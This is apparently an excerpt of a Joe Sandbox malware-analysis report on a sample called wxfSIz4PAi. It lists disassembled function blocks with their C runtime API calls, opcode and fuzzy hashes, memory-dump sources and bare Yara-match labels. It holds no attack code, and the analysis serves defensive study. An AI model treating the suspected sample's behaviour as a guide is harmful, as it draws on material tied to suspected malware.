                                                                                                                                                                                                                              • Instruction ID: 835e439df6746d9e4a645f0e3ab6fafaf2a1d36bb3e8ca10982b002e8b7a98f5
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f7272d8640a351cb7ba9f4033a28a6de6cf5ddfcb3ed898df1b07d3bb18c3361
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 12C15476D40204BBDB20DFA9CC43FDA77F8AF48744F15416AFE05EB282E67499818794
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,0042422F), ref: 00423249
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: DecodePointer
                                                                                                                                                                                                                              • String ID: /BB$acos$asin$exp$log$log10$pow$sqrt
                                                                                                                                                                                                                              • API String ID: 3527080286-1021189420
                                                                                                                                                                                                                              • Opcode ID: 630b55b5aee0cdac9947df96942a2c518d9551f2e4122bfaff5c71f9b894d309
                                                                                                                                                                                                                              • Instruction ID: 713dac25a3a6b9e2a85c2ced730dd83283c3aaa7dc4d76372812c5e21a3eb3ad
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 630b55b5aee0cdac9947df96942a2c518d9551f2e4122bfaff5c71f9b894d309
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C2514F71B00529CBDB10DF58F9485ADBBB0FF49315FE041A6D881A6264CB7D8B2AC72D
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • _free.LIBCMT ref: 05B76EA0
                                                                                                                                                                                                                                • Part of subcall function 05B76501: HeapFree.KERNEL32(00000000,00000000,?,05B7F288,?,00000000,?,00000000,?,05B7F52C,?,00000007,?,?,05B7F920,?), ref: 05B76517
                                                                                                                                                                                                                                • Part of subcall function 05B76501: GetLastError.KERNEL32(?,?,05B7F288,?,00000000,?,00000000,?,05B7F52C,?,00000007,?,?,05B7F920,?,?), ref: 05B76529
                                                                                                                                                                                                                              • _free.LIBCMT ref: 05B76EAC
                                                                                                                                                                                                                              • _free.LIBCMT ref: 05B76EB7
                                                                                                                                                                                                                              • _free.LIBCMT ref: 05B76EC2
                                                                                                                                                                                                                              • _free.LIBCMT ref: 05B76ECD
                                                                                                                                                                                                                              • _free.LIBCMT ref: 05B76ED8
                                                                                                                                                                                                                              • _free.LIBCMT ref: 05B76EE3
                                                                                                                                                                                                                              • _free.LIBCMT ref: 05B76EEE
                                                                                                                                                                                                                              • _free.LIBCMT ref: 05B76EF9
                                                                                                                                                                                                                              • _free.LIBCMT ref: 05B76F07
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1986509870.0000000005B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5b60000_wxfSIz4PAi.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 776569668-0
                                                                                                                                                                                                                              • Opcode ID: 7e08463fe454a3efb13b0bae982afa11f0016e82d7eaa394236c4ad25814e345
                                                                                                                                                                                                                              • Instruction ID: 15711257d70694a07246d10daf6088b033aec266cbc99b28d3cb5042ccdf636b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7e08463fe454a3efb13b0bae982afa11f0016e82d7eaa394236c4ad25814e345
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4811B376A1050CBFCB12EFA5C845CD93BA5EF04354B4184A5FA188F235EA32FE50EB81
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • _free.LIBCMT ref: 00416C39
                                                                                                                                                                                                                                • Part of subcall function 0041629A: RtlFreeHeap.NTDLL(00000000,00000000,?,0041F021,?,00000000,?,00000000,?,0041F2C5,?,00000007,?,?,0041F6B9,?), ref: 004162B0
                                                                                                                                                                                                                                • Part of subcall function 0041629A: GetLastError.KERNEL32(?,?,0041F021,?,00000000,?,00000000,?,0041F2C5,?,00000007,?,?,0041F6B9,?,?), ref: 004162C2
                                                                                                                                                                                                                              • _free.LIBCMT ref: 00416C45
                                                                                                                                                                                                                              • _free.LIBCMT ref: 00416C50
                                                                                                                                                                                                                              • _free.LIBCMT ref: 00416C5B
                                                                                                                                                                                                                              • _free.LIBCMT ref: 00416C66
                                                                                                                                                                                                                              • _free.LIBCMT ref: 00416C71
                                                                                                                                                                                                                              • _free.LIBCMT ref: 00416C7C
                                                                                                                                                                                                                              • _free.LIBCMT ref: 00416C87
                                                                                                                                                                                                                              • _free.LIBCMT ref: 00416C92
                                                                                                                                                                                                                              • _free.LIBCMT ref: 00416CA0
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 776569668-0
                                                                                                                                                                                                                              • Opcode ID: 7e08463fe454a3efb13b0bae982afa11f0016e82d7eaa394236c4ad25814e345
                                                                                                                                                                                                                              • Instruction ID: bc4a8488de18622ef43ac097d779123cba2550ccea22c0c0e46fff27a6ede036
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7e08463fe454a3efb13b0bae982afa11f0016e82d7eaa394236c4ad25814e345
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B611BC75100118BFDF01FF95D952DD93B65EF48358B42849AFD084F122D635EE919B44
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • __EH_prolog.LIBCMT ref: 05B6141C
                                                                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 05B6142E
                                                                                                                                                                                                                              • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 05B6146B
                                                                                                                                                                                                                                • Part of subcall function 05B680E1: _Yarn.LIBCPMT ref: 05B68100
                                                                                                                                                                                                                                • Part of subcall function 05B680E1: _Yarn.LIBCPMT ref: 05B68124
                                                                                                                                                                                                                              • std::bad_exception::bad_exception.LIBCMT ref: 05B6148C
                                                                                                                                                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 05B6149A
                                                                                                                                                                                                                              • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 05B614BD
                                                                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 05B6152E
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1986509870.0000000005B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5b60000_wxfSIz4PAi.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: std::_$Locinfo::_LockitYarn$Exception@8H_prologLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_Throwstd::bad_exception::bad_exception
                                                                                                                                                                                                                              • String ID: n~B
                                                                                                                                                                                                                              • API String ID: 835844855-2489732092
                                                                                                                                                                                                                              • Opcode ID: 64c16167f489f4d77b397d7091ed6621fbd9ca3405d2a72e65d09ca87552aa99
                                                                                                                                                                                                                              • Instruction ID: 11d9b9c1493863cd1ffbce285330b4e1eced9c340ce1bb4b63f487dc89cacbf7
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 64c16167f489f4d77b397d7091ed6621fbd9ca3405d2a72e65d09ca87552aa99
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 86316F71905B44DFC731AF29D84465AFBF4FF58610B208AAFE09A92A40CB78B601CF55
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • __EH_prolog.LIBCMT ref: 004011B5
                                                                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 004011C7
                                                                                                                                                                                                                              • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00401204
                                                                                                                                                                                                                                • Part of subcall function 00407E7A: _Yarn.LIBCPMT ref: 00407E99
                                                                                                                                                                                                                                • Part of subcall function 00407E7A: _Yarn.LIBCPMT ref: 00407EBD
                                                                                                                                                                                                                              • std::bad_exception::bad_exception.LIBCMT ref: 00401225
                                                                                                                                                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 00401233
                                                                                                                                                                                                                              • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00401256
                                                                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 004012C7
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: std::_$Locinfo::_LockitYarn$Exception@8H_prologLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_Throwstd::bad_exception::bad_exception
                                                                                                                                                                                                                              • String ID: bad locale name
                                                                                                                                                                                                                              • API String ID: 835844855-1405518554
                                                                                                                                                                                                                              • Opcode ID: 63e05c14b460d685efbaffe237daf51259fe89ad88eb658e1c08f97622123781
                                                                                                                                                                                                                              • Instruction ID: 0603089b66b0b819d6eff5d75331a99d5985645afad82bc6fef42f715fc6e5ae
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 63e05c14b460d685efbaffe237daf51259fe89ad88eb658e1c08f97622123781
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E0319131904B40DEC7319F6AD941A5BFBF0BF08710B508A7FE05AA3A91C738B904CB59
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1986509870.0000000005B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5b60000_wxfSIz4PAi.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: f1502d6197d2a0b4b305fcae2024c2ce003ecf790107f78a60311c4aa9610d50
                                                                                                                                                                                                                              • Instruction ID: 44ec4426671bd1f2684a2d52c23f77a9f53b7c55b631342135f6ba09e4656b90
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f1502d6197d2a0b4b305fcae2024c2ce003ecf790107f78a60311c4aa9610d50
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AFC18E74E0824DAFDB11DFA8C884BADBBB5FF09320F0841D5E965AB391C734A941CB65
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 05B76F80: GetLastError.KERNEL32(?,?,05B6E697,?,?,?,05B6ED94,?), ref: 05B76F84
                                                                                                                                                                                                                                • Part of subcall function 05B76F80: _free.LIBCMT ref: 05B76FB7
                                                                                                                                                                                                                                • Part of subcall function 05B76F80: SetLastError.KERNEL32(00000000), ref: 05B76FF8
                                                                                                                                                                                                                                • Part of subcall function 05B76F80: _abort.LIBCMT ref: 05B76FFE
                                                                                                                                                                                                                              • _memcmp.LIBVCRUNTIME ref: 05B74F5B
                                                                                                                                                                                                                              • _free.LIBCMT ref: 05B74FCC
                                                                                                                                                                                                                              • _free.LIBCMT ref: 05B74FE5
                                                                                                                                                                                                                              • _free.LIBCMT ref: 05B75017
                                                                                                                                                                                                                              • _free.LIBCMT ref: 05B75020
                                                                                                                                                                                                                              • _free.LIBCMT ref: 05B7502C
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1986509870.0000000005B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5b60000_wxfSIz4PAi.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _free$ErrorLast$_abort_memcmp
                                                                                                                                                                                                                              • String ID: C
                                                                                                                                                                                                                              • API String ID: 1679612858-1037565863
                                                                                                                                                                                                                              • Opcode ID: 8da020f59b73da55e944a716f6406de2f80b35aa4703f2a4fd96452cb970ac71
                                                                                                                                                                                                                              • Instruction ID: e4df20b6d9b139644259dda7ac61ec895de3453a5a8b232b97474c7b891fd016
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8da020f59b73da55e944a716f6406de2f80b35aa4703f2a4fd96452cb970ac71
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CEB13875A016199FDB24DF28C888AADB7B5FF08305F5045EAD96AA7350E731BE90CF40
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
                                                                                                                                                                                                                                • Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
                                                                                                                                                                                                                                • Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
                                                                                                                                                                                                                                • Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97
                                                                                                                                                                                                                              • _memcmp.LIBVCRUNTIME ref: 00414CF4
                                                                                                                                                                                                                              • _free.LIBCMT ref: 00414D65
                                                                                                                                                                                                                              • _free.LIBCMT ref: 00414D7E
                                                                                                                                                                                                                              • _free.LIBCMT ref: 00414DB0
                                                                                                                                                                                                                              • _free.LIBCMT ref: 00414DB9
                                                                                                                                                                                                                              • _free.LIBCMT ref: 00414DC5
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _free$ErrorLast$_abort_memcmp
                                                                                                                                                                                                                              • String ID: C
                                                                                                                                                                                                                              • API String ID: 1679612858-1037565863
                                                                                                                                                                                                                              • Opcode ID: e89ccd2a3967dbde377b9359045f7db90b46cd3f4383fc33eaa8f2e05e3481b2
                                                                                                                                                                                                                              • Instruction ID: f1eb2fe4340e97ed79650f57c8a8747809c023f352878a21904a4d61aa040acb
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e89ccd2a3967dbde377b9359045f7db90b46cd3f4383fc33eaa8f2e05e3481b2
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B7B12975A012199BDB24DF18D884BEEB7B4FF88304F5045AAE849A7350E735AED1CF48
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00417A45: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0041B3A4,00000000,?,00410DD1,?,00000008,?,0041197C,?,?,?), ref: 00417A77
                                                                                                                                                                                                                              • _free.LIBCMT ref: 004146D7
                                                                                                                                                                                                                              • _free.LIBCMT ref: 004146EE
                                                                                                                                                                                                                              • _free.LIBCMT ref: 0041470D
                                                                                                                                                                                                                              • _free.LIBCMT ref: 00414728
                                                                                                                                                                                                                              • _free.LIBCMT ref: 0041473F
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _free$AllocateHeap
                                                                                                                                                                                                                              • String ID: B$|B
                                                                                                                                                                                                                              • API String ID: 3033488037-200315465
                                                                                                                                                                                                                              • Opcode ID: 0551716ea73a6ef0ea3937d8a9b0131bc722ba02b4a1552fb15e10019e7b872c
                                                                                                                                                                                                                              • Instruction ID: bceed09af247e51911f2c06e24e965b8c83290834e1de00ea3c3fe4b0a612a45
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0551716ea73a6ef0ea3937d8a9b0131bc722ba02b4a1552fb15e10019e7b872c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F351E631A00304AFDB20DF66D841BAA77F4EF99728F14056EE849DB690E739DD81CB48
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,0040F850,0040F850,?,?,?,00416990,00000001,00000001,F5E85006), ref: 00416799
                                                                                                                                                                                                                              • __alloca_probe_16.LIBCMT ref: 004167D1
                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00416990,00000001,00000001,F5E85006,?,?,?), ref: 0041681F
                                                                                                                                                                                                                              • __alloca_probe_16.LIBCMT ref: 004168B6
                                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,F5E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00416919
                                                                                                                                                                                                                              • __freea.LIBCMT ref: 00416926
                                                                                                                                                                                                                                • Part of subcall function 00417A45: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0041B3A4,00000000,?,00410DD1,?,00000008,?,0041197C,?,?,?), ref: 00417A77
                                                                                                                                                                                                                              • __freea.LIBCMT ref: 0041692F
                                                                                                                                                                                                                              • __freea.LIBCMT ref: 00416954
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3864826663-0
                                                                                                                                                                                                                              • Opcode ID: 6d456281acf0619f27023182ced17daa6554775fa394724c4215adca619d4e4e
                                                                                                                                                                                                                              • Instruction ID: 945c2db0b5faf58cb0d9801c543b0b3226d139e5166d8e9d93898d86eb794442
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6d456281acf0619f27023182ced17daa6554775fa394724c4215adca619d4e4e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2B51E6B2610216ABDB259F65CC41EFF7BA9EF44754F16462EFC04D6280DB38DC90C668
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1986509870.0000000005B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5b60000_wxfSIz4PAi.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _free
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 269201875-0
                                                                                                                                                                                                                              • Opcode ID: b86ba08727650023ed19c92e77eeb825199b3895615cbf632ae48cc155c5a0ec
                                                                                                                                                                                                                              • Instruction ID: 815dd550ecce8a5d8dd7b23db9d96414f2836ba3b9a20b2360d0959191b8aff4
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b86ba08727650023ed19c92e77eeb825199b3895615cbf632ae48cc155c5a0ec
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8D61A275E44209AFDB20DFA8C840BAABBF5FF44710F1541AAE964EB240EB70B9418B54
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _free
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 269201875-0
                                                                                                                                                                                                                              • Opcode ID: 5e932ea9069c118bb961e6d76857f0c9b8f4ba2cd0390af678983e5fd13f1dd1
                                                                                                                                                                                                                              • Instruction ID: e986a1f43705154f11102f288933750ce46d6c5c7240a2201f23140d39e68ccb
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5e932ea9069c118bb961e6d76857f0c9b8f4ba2cd0390af678983e5fd13f1dd1
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6761A076904305AFDB20DF66C842BDABBF4EF48710F1441ABEC44EB281D7749D828B98
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1986509870.0000000005B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5b60000_wxfSIz4PAi.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _free$AllocateHeap
                                                                                                                                                                                                                              • String ID: B
                                                                                                                                                                                                                              • API String ID: 3033488037-2386870291
                                                                                                                                                                                                                              • Opcode ID: e2765243d4b407044065e09a93470513da81931724dfe5683d741b61e3df85b4
                                                                                                                                                                                                                              • Instruction ID: 2bd193db1208650c832d7312aa591d63aa420e5637344b0c407a32ccf4a5fe52
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e2765243d4b407044065e09a93470513da81931724dfe5683d741b61e3df85b4
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CE519E32A0070CAFDB21DF69D841A7A77F5FF49721B5405A9E86ADB250E731FA01CB81
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetConsoleCP.KERNEL32(?,?,?,?,?,?,?,?,?,05B763EF,?,?,?,?,?,?), ref: 05B75CBC
                                                                                                                                                                                                                              • __fassign.LIBCMT ref: 05B75D37
                                                                                                                                                                                                                              • __fassign.LIBCMT ref: 05B75D52
                                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,?,00000005,00000000,00000000), ref: 05B75D78
                                                                                                                                                                                                                              • WriteFile.KERNEL32(?,?,00000000,05B763EF,00000000,?,?,?,?,?,?,?,?,?,05B763EF,?), ref: 05B75D97
                                                                                                                                                                                                                              • WriteFile.KERNEL32(?,?,00000001,05B763EF,00000000,?,?,?,?,?,?,?,?,?,05B763EF,?), ref: 05B75DD0
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1986509870.0000000005B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5b60000_wxfSIz4PAi.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1324828854-0
                                                                                                                                                                                                                              • Opcode ID: 4f4f63612dd6758aa9e7fecd2cbe65b3dc713529ec1a556737616ebe55c1ece4
                                                                                                                                                                                                                              • Instruction ID: 57fe4a6488143d51e32631d76497eb73602ac25a079c52350b8859a79c24cf9a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4f4f63612dd6758aa9e7fecd2cbe65b3dc713529ec1a556737616ebe55c1ece4
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CB519771A002499FDB20CFA8DC85BEEBBF5FF09310F14419AE565E7291D730A951CBA4
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetConsoleCP.KERNEL32(?,?,?,?,?,?,?,?,?,00416188,?,?,?,?,?,?), ref: 00415A55
                                                                                                                                                                                                                              • __fassign.LIBCMT ref: 00415AD0
                                                                                                                                                                                                                              • __fassign.LIBCMT ref: 00415AEB
                                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,?,00000005,00000000,00000000), ref: 00415B11
                                                                                                                                                                                                                              • WriteFile.KERNEL32(?,?,00000000,00416188,00000000,?,?,?,?,?,?,?,?,?,00416188,?), ref: 00415B30
                                                                                                                                                                                                                              • WriteFile.KERNEL32(?,?,00000001,00416188,00000000,?,?,?,?,?,?,?,?,?,00416188,?), ref: 00415B69
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1324828854-0
                                                                                                                                                                                                                              • Opcode ID: 33e6fd75adb2b88f79627ef58a13688fd909e2cfbbaa5c9d8ec04a3e685d9078
                                                                                                                                                                                                                              • Instruction ID: 93abb8da7f4b1ee22325e29d014a78f54aaad6af2ae94e442d530b7aeff6bc03
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 33e6fd75adb2b88f79627ef58a13688fd909e2cfbbaa5c9d8ec04a3e685d9078
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7851E6B0A04609DFDB10CFA8D881BEEBBF4EF49310F14416BE955E7251D774A981CB68
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • _ValidateLocalCookies.LIBCMT ref: 0040A6FB
                                                                                                                                                                                                                              • ___except_validate_context_record.LIBVCRUNTIME ref: 0040A703
                                                                                                                                                                                                                              • _ValidateLocalCookies.LIBCMT ref: 0040A791
                                                                                                                                                                                                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 0040A7BC
                                                                                                                                                                                                                              • _ValidateLocalCookies.LIBCMT ref: 0040A811
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
